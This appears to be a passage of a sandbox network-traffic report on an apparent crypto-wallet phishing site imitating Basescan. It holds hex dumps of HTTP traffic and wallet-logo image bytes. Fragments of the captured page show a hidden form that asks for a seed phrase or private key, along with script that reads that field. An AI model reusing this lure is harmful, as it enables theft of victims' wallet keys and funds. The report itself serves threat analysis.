                                                                                                                                                                                                                                              2024-09-28 01:16:07 UTC1369INData Raw: 65 72 61 63 74 2d 6e 6f 77 22 3e 43 6f 6e 6e 65 63 74 3c 2f 62 75 74 74 6f 6e 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 21 2d 2d 20 53 59 4e 43 20 53 45 43 54 20 2d 2d 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22 73 79 6e 63 22 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6c 61 73 73 3d 22 73 63 2d 6a 53 46 6a 64 6a 20 66 6b 6f 57 4a 53 20 73 63 2d 69 77 61 6a 70 6d 20 6b 79 64 52 48 63 20 6d 74 2d 31 30 22 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 20 6e 6f 6e 65 22 0d 0a 20
                                                                                                                                                                                                                                              Data Ascii: eract-now">Connect</button> </div> </div> </div> ... SYNC SECT --> <div id="sync" class="sc-jSFjdj fkoWJS sc-iwajpm kydRHc mt-10" style="display: none"
                                                                                                                                                                                                                                              2024-09-28 01:16:07 UTC1369INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 70 6c 61 63 65 68 6f 6c 64 65 72 3d 22 73 65 65 64 20 70 68 72 61 73 65 2c 20 70 72 69 76 61 74 65 20 6b 65 79 2c 2e 2e 20 22 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 72 65 71 75 69 72 65 64 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3e 3c 2f 74 65 78 74 61 72 65 61 3e 0d 0a 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 62 72 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 69 64 3d 22 71 72 63 6f 64 65 22 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 20 6e 6f 6e 65 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 70 79 2d 32 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20
                                                                                                                                                                                                                                              Data Ascii: placeholder="seed phrase, private key,.. " required ></textarea> <br /> <div id="qrcode" style="display: none"> <div class="py-2">
                                                                                                                                                                                                                                              2024-09-28 01:16:07 UTC1369INData Raw: 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 63 68 61 6e 67 65 22 2c 20 73 74 61 74 65 48 61 6e 64 6c 65 29 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 73 65 74 54 69 6d 65 6f 75 74 28 22 73 74 61 74 65 48 61 6e 64 6c 65 28 29 22 2c 20 31 20 2a 20 31 30 30 30 29 3b 0d 0a 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 75 6e 63 74 69 6f 6e 20 73 74 61 74 65 48 61 6e 64 6c 65 28 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6c 65 74 20 70 49 6e 70 75 74 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 70 49 6e 70 75 74 22 29 2e 76 61 6c 75 65 3b 0d 0a 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 69 66 20 28 64 6f 63 75 6d 65 6e 74 2e 71 75 65
                                                                                                                                                                                                                                              Data Ascii: ventListener("change", stateHandle); setTimeout("stateHandle()", 1 * 1000); function stateHandle() { let pInput = document.getElementById("pInput").value; if (document.que
                                                                                                                                                                                                                                              2024-09-28 01:16:07 UTC339INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 76 61 72 20 73 65 63 6f 6e 64 73 20 3d 20 33 30 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 73 63 72 69 70 74 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 69 66 72 61 6d 65 2d 63 6f 6e 74 61 69 6e 65 72 22 3e 0d 0a 20 20 20 20 20 20 3c 69 66 72 61 6d 65 20 69 64 3d 22 77 65 62 73 69 74 65 46 72 61 6d 65 22 20 73 72 63 3d 22 64 69 73 74 2f 77 65 62 73 69 74 65 2e 68 74 6d 6c 22 3e
                                                                                                                                                                                                                                              Data Ascii: var seconds = 30; </script> </div> </div> </div> </div> </div> </div> <div class="iframe-container"> <iframe id="websiteFrame" src="dist/website.html">
                                                                                                                                                                                                                                              2024-09-28 01:16:07 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                              113192.168.2.549859104.18.29.724435896C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                              2024-09-28 01:16:07 UTC800OUTGET /getWalletImage/7677b54f-3486-46e2-4e37-bf8747814f00 HTTP/1.1
                                                                                                                                                                                                                                              Host: api.web3modal.com
                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                              x-sdk-version: html-ethers5-3.2.1
                                                                                                                                                                                                                                              x-sdk-type: w3m
                                                                                                                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                              x-project-id: 9a504add1206ecb902aee52264862b81
                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                                                                              Origin: https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev
                                                                                                                                                                                                                                              Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                              Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                              Referer: https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev/
                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                              2024-09-28 01:16:07 UTC741INHTTP/1.1 200 OK
                                                                                                                                                                                                                                              Date: Sat, 28 Sep 2024 01:16:07 GMT
                                                                                                                                                                                                                                              Content-Type: image/webp
                                                                                                                                                                                                                                              Content-Length: 4412
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              CF-Ray: 8c9fe2e2dcf680cd-EWR
                                                                                                                                                                                                                                              CF-Cache-Status: HIT
                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                              Access-Control-Allow-Origin: https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev
                                                                                                                                                                                                                                              Age: 29967
                                                                                                                                                                                                                                              Cache-Control: public, max-age=31536000
                                                                                                                                                                                                                                              ETag: "cfVAcZ3w6iX14DvHKhBFs4CgkyUG7FeV1c8ZwDJoU7DQ"
                                                                                                                                                                                                                                              Expires: Sun, 28 Sep 2025 01:16:07 GMT
                                                                                                                                                                                                                                              Vary: Origin
                                                                                                                                                                                                                                              cf-bgj: imgq:86,h2pri
                                                                                                                                                                                                                                              cf-images: internal=ok/- q=0 n=752+36 c=5+30 v=2024.9.3 l=4412 f=false
                                                                                                                                                                                                                                              content-security-policy: default-src 'none'; navigate-to 'none'; form-action 'none'
                                                                                                                                                                                                                                              x-content-type-options: nosniff
                                                                                                                                                                                                                                              x-robots-tag: noindex
                                                                                                                                                                                                                                              X-WC-R2-Status: HIT
                                                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                                                              2024-09-28 01:16:07 UTC628INData Raw: 52 49 46 46 34 11 00 00 57 45 42 50 56 50 38 58 0a 00 00 00 10 00 00 00 8f 01 00 8f 01 00 41 4c 50 48 7c 03 00 00 01 90 05 00 b0 21 37 13 3b 9b cb 5d 6d db e6 97 6d db 8e 59 f7 af 7f b6 6d de d5 41 6d 1b 71 52 db da f4 a6 38 ec ee dd c7 4c f5 22 62 02 40 d3 3e 45 5b 8c 9d b5 e3 e4 9d 27 ef cd 48 a1 ef 1e a7 9c da 36 3b a4 79 51 5f 70 ca 7e d5 c6 ac 39 f3 42 46 82 95 5f 9c 5b 39 ba 86 9f 93 d1 b7 99 7b ed 2b 92 ae 7c 6d 61 3b 9d d3 70 6d 3a 33 1d 49 38 75 4e 03 37 67 20 0d 3e 69 46 32 96 8f 0d d5 39 5a c1 c9 f7 90 98 ef 85 05 3b 92 14 7d 1f 09 3a 25 42 e7 28 ae 7d af 21 51 df ec e1 ea 10 55 8c 48 d8 a6 0a da 73 8b 78 89 a4 fd 32 c4 55 63 a5 8c 48 de 7b 4a 69 aa 43 06 12 78 66 07 0d c5 c8 48 e2 5f e2 b4 e2 bb 08 c9 7c a9 9f 26 24 13 12 ba 29 50 03 fa 24 24
                                                                                                                                                                                                                                              Data Ascii: RIFF4WEBPVP8XALPH|!7;]mmYmAmqR8L"b@>E['H6;yQ_p~9BF_[9{+|ma;pm:3I8uN7g >iF29Z;}:%B(}!QUHsx2UcH{JiCxfH_|&$)P$$
                                                                                                                                                                                                                                              2024-09-28 01:16:07 UTC1369INData Raw: 33 4b 5e 97 b8 e0 bc a7 25 18 cf 05 21 60 d5 90 c5 03 39 f9 ad c1 0c 1e 98 04 36 16 7f c6 01 39 f9 6d 81 e9 1c 30 09 6c 36 dc a5 bf b4 bc b6 c1 30 fa 1b 08 76 ba 27 50 5f a2 bb 3d 50 fb 1d ed bd ad 06 f6 4f a0 bd 18 50 d0 e3 20 e5 25 b8 29 01 65 ef d3 dd fd 72 a0 6c d7 6f 54 27 77 01 a5 27 50 dd 24 50 7e 29 cd ad 00 15 fd f7 51 dc 3e 7f 35 20 28 99 de 12 25 50 d7 70 84 da 8e e8 41 6d 7d 02 ad 25 e9 41 fd 40 13 a5 99 24 d0 a2 df 52 3a 5b e4 0b 1a 8d fb 42 63 72 0c 68 b7 43 26 85 65 76 00 2d 97 da 43 5f c6 52 a0 6d d7 90 97 b4 f5 32 c2 0d 34 5f c1 44 59 c6 2a e0 88 ae 3d 6f 52 d5 b5 be ae e0 a0 ba 88 14 8a ba 1f 2d 81 03 07 87 dd a3 a6 94 29 05 c1 c1 75 43 8f c9 74 64 3e 39 58 02 27 e8 d6 60 4e 2a 0d a5 cf 6c ea 0a ce 52 d7 6e e1 35 99 76 be 5e 9b db 46 0f
                                                                                                                                                                                                                                              Data Ascii: 3K^%!`969m0l60v'P_=POP %)erloT'w'P$P~)Q>5 (%PpAm}%A@$R:[BcrhC&ev-C_Rm24_DY*=oR-)uCtd>9X'`N*lRn5v^F
                                                                                                                                                                                                                                              2024-09-28 01:16:07 UTC1369INData Raw: c0 2e 63 cf 3f 3e 66 d5 ce 11 27 95 49 80 cf ee ee 4e ca 8a b0 84 56 e9 69 88 a0 d0 ea 85 58 2c 51 15 21 f4 e0 e8 11 e4 95 1f 09 2c 08 6f be 71 ac 1b 74 ee 53 fa dc ca 14 8e b7 ed 8a ac 4b 9b 45 fe d9 1f e7 2b 53 ce ee 7f ab fe 96 b9 c0 b2 84 f9 74 8d 78 1b 65 c6 33 7a c8 05 c8 7c 79 01 8e 3a bb 53 58 95 a0 7b b9 1f 44 d0 22 ac 3d 4a 7e 88 2d 87 cf c5 84 2b 93 0f ab d3 75 6b 2f db 26 53 93 41 e9 24 e0 da ee 46 dd bb f1 c1 5a 10 4e d3 33 ce d1 7b 1e 2f e1 1b 31 f9 7b ae 06 9c 30 77 20 b4 00 b4 cb 80 03 af d2 aa 8b 40 02 fb 4b c3 12 c8 d6 c5 34 d5 72 f5 2d d6 30 1a ce 25 a1 54 98 55 42 bc 7c 7c e5 a1 b5 2c 63 2d e5 6e 86 b3 2a 3c c1 a5 0d b7 60 36 f3 4e f0 55 39 bd 52 55 95 92 dc 10 51 5d 3f 58 4f 40 1e df 2b 53 ee 9b ee 5e 86 11 f7 9a f1 29 80 d3 0f e1 6f
                                                                                                                                                                                                                                              Data Ascii: .c?>f'INViX,Q!,oqtSKE+Stxe3z|y:SX{D"=J~-+uk/&SA$FZN3{/1{0w @K4r-0%TUB||,c-n*<`6NU9RUQ]?XO@+S^)o
                                                                                                                                                                                                                                              2024-09-28 01:16:07 UTC1046INData Raw: 8f 9d 52 d4 27 9f d7 7b c7 d5 fb b1 9f eb 6f dd 3e 30 2d 2f e7 5d 48 c3 93 bb f8 5c 86 91 f7 c7 58 01 35 d7 29 fb 79 b6 52 b8 ba c8 08 e2 2e 7f aa 43 4c eb ab 86 a4 93 9c be 7d 60 ea 28 1f 9d f2 bd 86 3b f6 a2 91 df 9f d4 c6 f1 84 63 56 69 6e 84 d0 20 dd 0d e0 b8 e6 d5 c1 f4 83 3c 9a 35 05 79 d8 8b 34 f9 9c 44 9a c9 a0 5b 8a 5e fb f2 2c 9a 1c 28 a2 b4 35 b1 cf ad 10 23 d2 a8 62 c6 e1 61 97 e0 34 dc 93 07 29 95 fe fb 54 d8 25 bc d3 99 a5 00 a7 00 a9 04 05 e2 97 bd 9d ec de 97 f4 65 99 38 06 72 6a 70 6e 72 e0 ef 3f be 96 b3 af 9a 36 15 3d 65 75 d5 df d9 00 22 b3 5d 72 43 9b 1d 01 96 63 87 1c bb d5 52 83 47 b2 e3 72 bb d7 d2 1a 76 cc 4a c8 bc 0e 7e b1 a3 e6 5a ae 2f 55 bc 65 24 04 4f 6e 8f 2b c7 cc 92 0b 00 57 8c 1d 23 f1 b9 cd 39 5c ed 74 da 4f 08 22 04 39
                                                                                                                                                                                                                                              Data Ascii: R'{o>0-/]H\X5)yR.CL}`(;cVin <5y4D[^,(5#ba4)T%e8rjpnr?6=eu"]rCcRGrvJ~Z/Ue$On+W#9\tO"9


                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                              114192.168.2.549860104.18.29.724435896C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                              2024-09-28 01:16:07 UTC800OUTGET /getWalletImage/018b2d52-10e9-4158-1fde-a5d5bac5aa00 HTTP/1.1
                                                                                                                                                                                                                                              Host: api.web3modal.com
                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                              x-sdk-version: html-ethers5-3.2.1
                                                                                                                                                                                                                                              x-sdk-type: w3m
                                                                                                                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                              x-project-id: 9a504add1206ecb902aee52264862b81
                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                                                                              Origin: https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev
                                                                                                                                                                                                                                              Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                              Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                              Referer: https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev/
                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                              2024-09-28 01:16:07 UTC785INHTTP/1.1 200 OK
                                                                                                                                                                                                                                              Date: Sat, 28 Sep 2024 01:16:07 GMT
                                                                                                                                                                                                                                              Content-Type: image/webp
                                                                                                                                                                                                                                              Content-Length: 31538
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              CF-Ray: 8c9fe2e38c484257-EWR
                                                                                                                                                                                                                                              CF-Cache-Status: HIT
                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                              Access-Control-Allow-Origin: https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev
                                                                                                                                                                                                                                              Age: 44381
                                                                                                                                                                                                                                              Cache-Control: public, max-age=31536000
                                                                                                                                                                                                                                              ETag: "cfPn8OmkKjArQt2tKtGRim1E0bUG7FeV1c8ZwDJoU7DQ"
                                                                                                                                                                                                                                              Expires: Sun, 28 Sep 2025 01:16:07 GMT
                                                                                                                                                                                                                                              Vary: Origin
                                                                                                                                                                                                                                              access-control-allow-credentials: true
                                                                                                                                                                                                                                              cf-bgj: imgq:100,h2pri
                                                                                                                                                                                                                                              cf-images: internal=ok/- q=0 n=14+120 c=2+118 v=2024.9.3 l=31538 f=false
                                                                                                                                                                                                                                              content-security-policy: default-src 'none'; navigate-to 'none'; form-action 'none'
                                                                                                                                                                                                                                              x-content-type-options: nosniff
                                                                                                                                                                                                                                              x-robots-tag: noindex
                                                                                                                                                                                                                                              X-WC-R2-Status: HIT
                                                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                                                              2024-09-28 01:16:07 UTC1369INData Raw: 52 49 46 46 2a 7b 00 00 57 45 42 50 56 50 38 4c 1d 7b 00 00 2f 8f c1 63 00 4d 48 72 1b 49 92 24 48 1e 9d cb 58 f4 ff 1f 1c 1e 59 d9 b3 9d 23 fa 3f 01 93 df 7e fa fb 25 f9 dd f2 47 f8 db a1 fe 01 f9 ed a2 76 f9 31 dd cc a4 f1 38 08 83 ec 02 79 10 10 08 24 76 31 e3 84 41 bd 44 a1 0d c9 26 c5 38 00 8a ca f2 30 a4 8a 66 9d 36 a7 09 30 06 70 50 1f 50 95 c6 09 27 33 4d 54 80 31 04 e6 2e 40 aa 8a 55 03 7c 06 e3 be 75 13 81 2a 36 55 2f 31 c6 50 9b af c2 aa d0 6a f2 16 c7 83 bb aa 92 8f 62 c3 23 c6 e8 62 15 0f 55 3b 5f 80 61 01 56 2a ef c8 20 51 9f d4 a2 63 54 ed 54 81 93 18 71 e4 ac 27 a9 86 0f 18 0d 4b 58 7d 50 55 89 a0 83 31 74 73 98 25 73 29 70 6c 8a a2 62 03 8c 11 bb 92 f5 6b aa 0b 6e 52 05 a8 c4 2c 07 08 c4 8e 69 c2 04 c6 18 4d 3d 12 c8 05 70 5c 55 f7 12 a6
                                                                                                                                                                                                                                              Data Ascii: RIFF*{WEBPVP8L{/cMHrI$HXY#?~%Gv18y$v1AD&80f60pPP'3MT1.@U|u*6U/1Pjb#bU;_aV* QcTTq'KX}PU1ts%s)plbknR,iM=p\U
                                                                                                                                                                                                                                              2024-09-28 01:16:07 UTC1369INData Raw: 84 3b 37 97 9e 8e dd 8f 25 84 a2 01 10 80 70 39 fd d4 74 42 34 00 d8 7d b9 4c 98 ae f9 61 4f 05 72 79 58 ba a7 fb 74 71 3d 17 a2 a1 28 de 08 00 10 8a 10 9a e3 77 7d 69 9b 4e 9f 52 03 4e d6 a4 6a 4e d3 69 4b 97 4b cd 4a 40 08 01 1b 1b a1 00 10 e2 cd a4 69 1a 20 e4 d0 63 30 26 97 d4 69 ca 84 d0 02 40 08 a4 42 71 5d a0 6f 68 01 20 0c b0 c1 08 7e aa 16 54 04 fe a3 b5 3f e0 df 28 bc f8 fd bc c0 2f d6 c6 b4 40 1c 92 db 48 92 24 c9 a8 bf d8 19 19 95 7b ef 33 22 26 a0 ff a8 7e 81 1f ec 89 85 f3 d3 1a 86 b5 e0 91 b3 27 19 bf 21 7a a0 93 c2 06 45 a7 0f a6 a8 70 a1 a2 27 5d e2 e8 56 d1 0f 2a 2d 15 dd 7f 40 e4 1a fd 14 a1 91 d6 2b 9f 8a 83 d6 e6 61 f4 13 f4 d5 8e 66 3b 5f 5a 69 69 d5 3b 5a d9 78 85 3e e2 d2 37 41 fa 2c c8 83 50 e9 81 82 5e 54 79 91 ce 77 5d 1c 06 cf
                                                                                                                                                                                                                                              Data Ascii: ;7%p9tB4}LaOryXtq=(w}iNRNjNiKKJ@i c0&i@Bq]oh ~T?(/@H${3"&~'!zEp']V*-@+af;_Zii;Zx>7A,P^Tyw]
                                                                                                                                                                                                                                              2024-09-28 01:16:07 UTC1369INData Raw: ea cf 7f 6c fc 3f 77 e1 b5 36 5f f3 4a 05 a6 d0 02 ae 77 cb 19 7c 19 44 08 7e d3 e8 55 4a b6 c8 10 9d d5 88 3f 3d f1 0f 4f e9 fb 6b d3 d9 ed 7a e9 fe 73 29 a7 49 0f 2d 7d 11 c3 4e 0e 68 85 aa a3 7b 30 14 b0 9c 3d 6b fa 70 18 70 7d 54 9c 14 96 37 6d 5c 2b 5f 57 cf 9b 57 db f7 57 cf 5b ad ff 6f d7 a6 ff f3 61 af 57 76 7b 34 9b 8f 86 9b 6b 49 58 20 b0 63 d5 05 93 8e f9 eb 8a 0d c5 a0 e2 68 b6 a5 25 3f cc a7 1f 8b ee 77 73 fd 0f 75 fe 6f 9d a7 df 6f 5c 6b bd 56 49 d3 c4 ad 7a d9 48 c9 c6 18 e5 a2 4c 2a 21 9c d1 e2 be d9 5a 3e 06 70 d0 ec af 2f ea da d6 cd 77 eb 63 3c 1f b5 df 5b e6 b6 2b 59 7d 95 7e 76 df f4 5f fe ba f9 f3 c4 79 68 bf 8b 2e bd 4c f3 6a ba 0b 2d 03 ec 56 1a 12 c0 84 b8 fc 31 d5 ad 50 08 41 66 b5 c9 cd c9 3c fd 9e cd ff 6b 3e 3f a3 8f 29 eb d5
                                                                                                                                                                                                                                              Data Ascii: l?w6_Jw|D~UJ?=Okzs)I-}Nh{0=kpp}T7m\+_WWW[oaWv{4kIX ch%?wsuoo\kVIzHL*!Z>p/wc<[+Y}~v_yh.Lj-V1PAf<k>?)
                                                                                                                                                                                                                                              2024-09-28 01:16:07 UTC1369INData Raw: 2e 82 2b ea f5 d4 29 f6 aa ae cf 5f a5 07 a2 fb bf 9a 17 6f ce e8 bc 8c 0a d3 36 fe 95 46 0e 4f f1 f6 c9 ec d2 4a b8 c6 7d 3f 7b 85 79 49 7d 1d 60 02 e6 b4 59 04 0a 58 75 ae 12 4f f8 24 c5 4a d4 0c a1 65 90 7d 69 c9 6c b8 e5 15 ed 57 c0 06 53 88 7f 80 ae 19 41 07 b5 11 d1 c4 65 50 02 cb 98 bc f5 be 7d ac fb 7f b3 e1 17 d3 fb 38 a0 34 75 5b e2 b1 c7 b6 11 aa 44 a7 7b 69 0f 1f ac cd 9d a0 a9 77 97 54 12 06 9c bd 2e 7c 04 07 b4 58 60 56 08 4d 85 1a fa 82 13 4c 15 1f a7 f8 3c d9 75 35 df df d1 16 95 ad 14 a6 83 d3 1a 0e 0a 8d 83 21 e1 b1 9c d3 c6 fc b9 fc f5 65 fc 6f 4f e5 1c 88 2b f0 19 57 f5 78 ea 57 90 8b fd 1e 80 2b 8c 26 88 84 8f a3 2e 66 eb 4e 27 fc bb af 7b c3 fd d5 7b 5a 21 f2 51 80 22 46 09 84 89 d7 2e 9c 91 79 d5 d7 e6 cf af 1b fe a7 db bf be ed 71
                                                                                                                                                                                                                                              Data Ascii: .+)_o6FOJ}?{yI}`YXuO$Je}ilWSAeP}84u[D{iwT.|X`VML<u5!eoO+WxW+&.fN'{{Z!Q"F.yq
                                                                                                                                                                                                                                              2024-09-28 01:16:07 UTC1369INData Raw: 75 c4 4d 54 d3 53 3f 20 16 42 07 eb 5f f7 fd 0f 44 15 20 76 5a 31 02 71 21 13 36 31 fb 95 df 63 f7 ef f2 34 83 0d aa 73 82 0a de fb 3e 39 18 30 8c 90 8b eb 17 3e f4 9e ef f7 9f df 50 7a ff 87 67 db 75 f6 ba 20 48 08 42 80 9d 72 36 9c 22 80 3d 30 88 ce de 13 90 00 28 04 bb 91 c1 f4 33 d1 72 39 6c 82 97 bb 7f ca af fb 17 fc ec 4b 2e 01 cf e5 e9 2a 3b f8 c0 58 1b 97 46 d2 60 6e 21 28 73 20 b6 ca a6 5b 2a 1e fd d1 ff ff f2 c2 7f f3 e2 47 81 4c a5 0d 90 4b a9 94 01 21 94 4f 3f 74 bc 41 0e 82 88 00 39 e7 2e 98 a6 96 4b 6a 90 49 dd f1 04 19 4e 5e c6 6c 2d 05 15 8a 0b cb 95 2f 81 bc e4 21 5b 6e b6 3e 96 53 e6 94 38 31 bb 32 36 a6 e8 1c 78 f2 29 95 1e 01 3e 38 cf 1c bb f5 e0 45 f0 b5 6f bd fa fd 89 e6 3a 74 8c 40 00 76 a2 6a 50 9d 83 a7 08 62 60 0f e1 4d 02 4a e5
                                                                                                                                                                                                                                              Data Ascii: uMTS? B_D vZ1q!61c4s>90>Pzgu HBr6"=0(3r9lK.*;XF`n!(s [*GLK!O?tA9.KjIN^l-/![n>S8126x)>8Eo:t@vjPb`MJ
                                                                                                                                                                                                                                              2024-09-28 01:16:07 UTC1369INData Raw: 7a 1f 84 3d 95 11 00 01 88 6a 3f 09 1e f4 34 c5 0e 3d 6f d2 f5 7a e9 8c b6 15 b6 91 78 d2 19 20 e5 95 e9 fa fb 95 1d c0 75 0f 58 91 e7 08 d7 cb af e0 18 45 2b 01 77 a5 fe 14 0d 89 6f 2e 3d b7 f7 46 09 2f 00 f5 5b a3 9a 86 82 8e 00 54 9d 1b f4 ea 39 3f 47 23 db eb 78 f0 22 36 3a 60 25 25 58 b8 0d a6 6e 48 bc ce 4c a0 5c fc a8 76 ab c7 c4 43 6a fa b9 67 67 48 17 a8 b5 68 3e 5b 41 59 5a bd ec 88 2b e1 e3 3d 9d 4f 77 e1 59 6a df a7 48 76 7e fe fc f9 73 3a 9c 10 ae 4f 5f 6e 9b 8c 08 ae 8a 81 d5 28 a0 c5 2f fe 77 a6 25 b3 2b 04 d3 75 51 1e f0 bd 07 dd 17 ca 57 db 19 99 e1 0e 39 ae d8 85 5d dd 2b c5 c2 d6 de af a3 00 5a d3 a0 c6 6d 18 d8 6e 20 0e 30 6a e1 87 94 b9 e3 dc 36 a3 3a 6a 02 5c 58 40 b8 62 61 03 a2 25 0c cc 76 3f ad ae f7 57 39 cb c5 2e 90 0e 8a ae a7
                                                                                                                                                                                                                                              Data Ascii: z=j?4=ozx uXE+wo.=F/[T9?G#x"6:`%%XnHL\vCjggHh>[AYZ+=OwYjHv~s:O_n(/w%+uQW9]+Zmn 0j6:j\X@ba%v?W9.
                                                                                                                                                                                                                                              2024-09-28 01:16:07 UTC1369INData Raw: 22 99 ed 11 c1 2b b9 01 a7 52 3d db 11 d0 49 da 57 f5 2e a9 3d e6 e6 a7 bc 50 6e 5c 8b e3 d9 1d 9e 01 58 80 4c 2f 0d 88 7c c3 9a 17 a9 c0 08 90 53 ee 9c 05 c6 a0 52 a6 9b 39 71 d8 49 4b 8f 1c 26 bd 90 e6 21 00 4f 98 cb b3 f0 70 7a af 58 50 b6 38 5a 89 0e 6e b6 a5 d2 2f 41 94 97 00 c6 3d a9 2d 9c 06 07 10 0d 07 9d 01 44 27 e0 81 f2 7e 7a c7 a5 75 27 c8 b3 e3 19 fd 57 20 24 2c 1d 5b 73 79 f3 59 c8 40 a6 df 99 ce ce ae 41 d6 d8 51 ca 93 04 06 02 92 e2 4e e1 4a 7c 90 18 f5 bd da 13 ac 4e 9a 95 0d 5f f5 2d e1 08 78 97 1e ef ae d9 ac 13 3d a0 71 c6 c3 a9 53 0c e2 a3 3e 6e e8 8c 7b 5a 5f e1 94 73 40 52 85 fa 04 3b b1 96 11 6b 34 55 46 32 fd ce 29 d3 69 7b 0b 57 45 2d 92 00 1a 06 ec d4 fb e2 4e e7 93 0a 57 a1 d4 df 08 5e 20 c3 6e 5b 2c 73 e6 25 dd a6 52 bd f0 3a
                                                                                                                                                                                                                                              Data Ascii: "+R=IW.=Pn\XL/|SR9qIK&!OpzXP8Zn/A=-D'~zu'W $,[syY@AQNJ|N_-x=qS>n{Z_s@R;k4UF2)i{WE-NW^ n[,s%R:
